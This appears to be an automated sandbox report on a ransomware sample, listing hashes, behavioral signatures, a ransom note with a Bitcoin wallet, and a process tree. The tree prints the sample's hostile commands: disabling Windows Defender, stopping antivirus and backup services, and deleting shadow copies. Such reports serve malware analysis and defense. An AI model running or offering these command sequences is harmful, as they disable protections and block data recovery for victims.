Analysis
-
max time kernel
88s -
max time network
153s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
26-07-2021 12:40
Static task
static1
Behavioral task
behavioral1
Sample
58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe
Resource
win10v20210410
General
-
Target
58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe
-
Size
82KB
-
MD5
e01e11dca5e8b08fc8231b1cb6e2048c
-
SHA1
4983d07f004436caa3f10b38adacbba6a4ede01a
-
SHA256
58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f
-
SHA512
298bfb9fe55ddd80f1c6671622d7e9e865899a855b5bb8e0d85d8520160cedca6fd8bc72c9881925477bcab883bf6e6f4c69f997b774b74fe992e023a81269de
Malware Config
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Blocklisted process makes network request 3 IoCs
flow pid Process 24 5036 mshta.exe 26 5036 mshta.exe 28 5036 mshta.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 5684 lux2okcs.exe -
Modifies extensions of user files 7 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File created C:\Users\Admin\Pictures\OutStep.png.crypted 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe File created C:\Users\Admin\Pictures\SetUse.tiff.crypted 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe File opened for modification C:\Users\Admin\Pictures\SetUse.tiff 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe File created C:\Users\Admin\Pictures\SubmitUnpublish.tiff.crypted 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe File opened for modification C:\Users\Admin\Pictures\SubmitUnpublish.tiff 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe File created C:\Users\Admin\Pictures\EnableHide.tiff.crypted 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe File opened for modification C:\Users\Admin\Pictures\EnableHide.tiff 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe -
Enumerates connected drives 3 TTPs 18 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\f: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\f: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe -
Modifies WinLogon 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your Files are Encrypted.\r\n\r\nDon’t worry, you can return all your files!\r\n\r\nYou've got 48 hours(2 Days), before you lost your files forever.\r\nI will treat you good if you treat me good too.\r\n\r\nThe Price to get all things to the normal : 20,000$\r\nMy BTC Wallet ID :\r\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\r\n\r\nContact :\r\[email protected]\r\n" 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..." 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 14 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 6164 vssadmin.exe 6180 vssadmin.exe 2412 vssadmin.exe 5224 vssadmin.exe 6156 vssadmin.exe 5024 vssadmin.exe 4248 vssadmin.exe 2228 vssadmin.exe 5608 vssadmin.exe 4648 vssadmin.exe 4472 vssadmin.exe 6148 vssadmin.exe 6060 vssadmin.exe 2400 vssadmin.exe -
Kills process with taskkill 3 IoCs
pid Process 6032 taskkill.exe 5192 taskkill.exe 6120 taskkill.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 248 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3520 powershell.exe 3520 powershell.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3520 powershell.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe Token: SeDebugPrivilege 3520 powershell.exe Token: SeIncreaseQuotaPrivilege 3520 powershell.exe Token: SeSecurityPrivilege 3520 powershell.exe Token: SeTakeOwnershipPrivilege 3520 powershell.exe Token: SeLoadDriverPrivilege 3520 powershell.exe Token: SeSystemProfilePrivilege 3520 powershell.exe Token: SeSystemtimePrivilege 3520 powershell.exe Token: SeProfSingleProcessPrivilege 3520 powershell.exe Token: SeIncBasePriorityPrivilege 3520 powershell.exe Token: SeCreatePagefilePrivilege 3520 powershell.exe Token: SeBackupPrivilege 3520 powershell.exe Token: SeRestorePrivilege 3520 powershell.exe Token: SeShutdownPrivilege 3520 powershell.exe Token: SeDebugPrivilege 3520 powershell.exe Token: SeSystemEnvironmentPrivilege 3520 powershell.exe Token: SeRemoteShutdownPrivilege 3520 powershell.exe Token: SeUndockPrivilege 3520 powershell.exe Token: SeManageVolumePrivilege 3520 powershell.exe Token: 33 3520 powershell.exe Token: 34 3520 powershell.exe Token: 35 3520 powershell.exe Token: 36 3520 powershell.exe Token: SeDebugPrivilege 2112 powershell.exe Token: SeDebugPrivilege 2180 powershell.exe Token: SeDebugPrivilege 3860 powershell.exe Token: SeDebugPrivilege 2472 powershell.exe Token: SeDebugPrivilege 1820 powershell.exe Token: SeDebugPrivilege 4028 powershell.exe Token: SeDebugPrivilege 2236 powershell.exe Token: SeDebugPrivilege 3844 powershell.exe Token: SeDebugPrivilege 4192 powershell.exe Token: SeDebugPrivilege 4316 powershell.exe Token: SeDebugPrivilege 4464 powershell.exe Token: SeDebugPrivilege 4576 powershell.exe Token: SeDebugPrivilege 6120 taskkill.exe Token: SeDebugPrivilege 6032 taskkill.exe Token: SeDebugPrivilege 5192 taskkill.exe Token: SeIncreaseQuotaPrivilege 2472 powershell.exe Token: SeSecurityPrivilege 2472 powershell.exe Token: SeTakeOwnershipPrivilege 2472 powershell.exe Token: SeLoadDriverPrivilege 2472 powershell.exe Token: SeSystemProfilePrivilege 2472 powershell.exe Token: SeSystemtimePrivilege 2472 powershell.exe Token: SeProfSingleProcessPrivilege 2472 powershell.exe Token: SeIncBasePriorityPrivilege 2472 powershell.exe Token: SeCreatePagefilePrivilege 2472 powershell.exe Token: SeBackupPrivilege 2472 powershell.exe Token: SeRestorePrivilege 2472 powershell.exe Token: SeShutdownPrivilege 2472 powershell.exe Token: SeDebugPrivilege 2472 powershell.exe Token: SeSystemEnvironmentPrivilege 2472 powershell.exe Token: SeRemoteShutdownPrivilege 2472 powershell.exe Token: SeUndockPrivilege 2472 powershell.exe Token: SeManageVolumePrivilege 2472 powershell.exe Token: 33 2472 powershell.exe Token: 34 2472 powershell.exe Token: 35 2472 powershell.exe Token: 36 2472 powershell.exe Token: SeBackupPrivilege 5396 vssvc.exe Token: SeRestorePrivilege 5396 vssvc.exe Token: SeAuditPrivilege 5396 vssvc.exe Token: SeIncreaseQuotaPrivilege 2180 powershell.exe Token: SeSecurityPrivilege 2180 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3196 wrote to memory of 3520 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 76 PID 3196 wrote to memory of 3520 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 76 PID 3196 wrote to memory of 2112 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 79 PID 3196 wrote to memory of 2112 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 79 PID 3196 wrote to memory of 2180 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 81 PID 3196 wrote to memory of 2180 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 81 PID 3196 wrote to memory of 3860 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 83 PID 3196 wrote to memory of 3860 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 83 PID 3196 wrote to memory of 2472 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 85 PID 3196 wrote to memory of 2472 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 85 PID 3196 wrote to memory of 1820 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 87 PID 3196 wrote to memory of 1820 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 87 PID 3196 wrote to memory of 4028 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 89 PID 3196 wrote to memory of 4028 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 89 PID 3196 wrote to memory of 2236 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 91 PID 3196 wrote to memory of 2236 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 91 PID 3196 wrote to memory of 3844 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 93 PID 3196 wrote to memory of 3844 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 93 PID 3196 wrote to memory of 4192 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 95 PID 3196 wrote to memory of 4192 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 95 PID 3196 wrote to memory of 4316 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 97 PID 3196 wrote to memory of 4316 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 97 PID 3196 wrote to memory of 4464 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 99 PID 3196 wrote to memory of 4464 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 99 PID 3196 wrote to memory of 4576 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 101 PID 3196 wrote to memory of 4576 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 101 PID 3196 wrote to memory of 4660 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 103 PID 3196 wrote to memory of 4660 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 103 PID 3196 wrote to memory of 4700 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 104 PID 3196 wrote to memory of 4700 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 104 PID 3196 wrote to memory of 4740 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 105 PID 3196 wrote to memory of 4740 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 105 PID 3196 wrote to memory of 4812 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 107 PID 3196 wrote to memory of 4812 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 107 PID 3196 wrote to memory of 4888 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 109 PID 3196 wrote to memory of 4888 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 109 PID 3196 wrote to memory of 4940 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 121 PID 3196 wrote to memory of 4940 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 121 PID 3196 wrote to memory of 4984 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 111 PID 3196 wrote to memory of 4984 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 111 PID 3196 wrote to memory of 5068 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 258 PID 3196 wrote to memory of 5068 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 258 PID 3196 wrote to memory of 4024 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 257 PID 3196 wrote to memory of 4024 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 257 PID 3196 wrote to memory of 4328 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 117 PID 3196 wrote to memory of 4328 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 117 PID 3196 wrote to memory of 4588 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 115 PID 3196 wrote to memory of 4588 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 115 PID 4660 wrote to memory of 4652 4660 net.exe 165 PID 4660 wrote to memory of 4652 4660 net.exe 165 PID 3196 wrote to memory of 4896 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 163 PID 3196 wrote to memory of 4896 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 163 PID 4740 wrote to memory of 5056 4740 net.exe 161 PID 4740 wrote to memory of 5056 4740 net.exe 161 PID 4700 wrote to memory of 4960 4700 net.exe 229 PID 4700 wrote to memory of 4960 4700 net.exe 229 PID 3196 wrote to memory of 5076 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 159 PID 3196 wrote to memory of 5076 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 159 PID 4812 wrote to memory of 508 4812 net.exe 158 PID 4812 wrote to memory of 508 4812 net.exe 158 PID 3196 wrote to memory of 4976 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 123 PID 3196 wrote to memory of 4976 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 123 PID 4888 wrote to memory of 5168 4888 net.exe 155 PID 3196 wrote to memory of 5176 3196 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe 124
Processes
-
C:\Users\Admin\AppData\Local\Temp\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe"C:\Users\Admin\AppData\Local\Temp\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe"1⤵
- Modifies extensions of user files
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3196 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3520
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2112
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2180
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3860
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2472
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1820
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4028
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 62⤵
- Suspicious use of AdjustPrivilegeToken
PID:2236
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:3844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 62⤵
- Suspicious use of AdjustPrivilegeToken
PID:4192
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 62⤵
- Suspicious use of AdjustPrivilegeToken
PID:4316
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4464
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 22⤵
- Suspicious use of AdjustPrivilegeToken
PID:4576
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop avpsus /y2⤵
- Suspicious use of WriteProcessMemory
PID:4660 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵PID:4652
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵
- Suspicious use of WriteProcessMemory
PID:4700 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵PID:4960
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfewc /y2⤵
- Suspicious use of WriteProcessMemory
PID:4740 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵PID:5056
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BMR Boot Service /y2⤵
- Suspicious use of WriteProcessMemory
PID:4812 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵PID:508
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵
- Suspicious use of WriteProcessMemory
PID:4888 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵PID:5168
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ccEvtMgr /y2⤵PID:4984
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y3⤵PID:5404
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ccSetMgr /y2⤵PID:5068
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y3⤵PID:5412
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBFCService /y2⤵PID:4588
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBFCService /y3⤵PID:5752
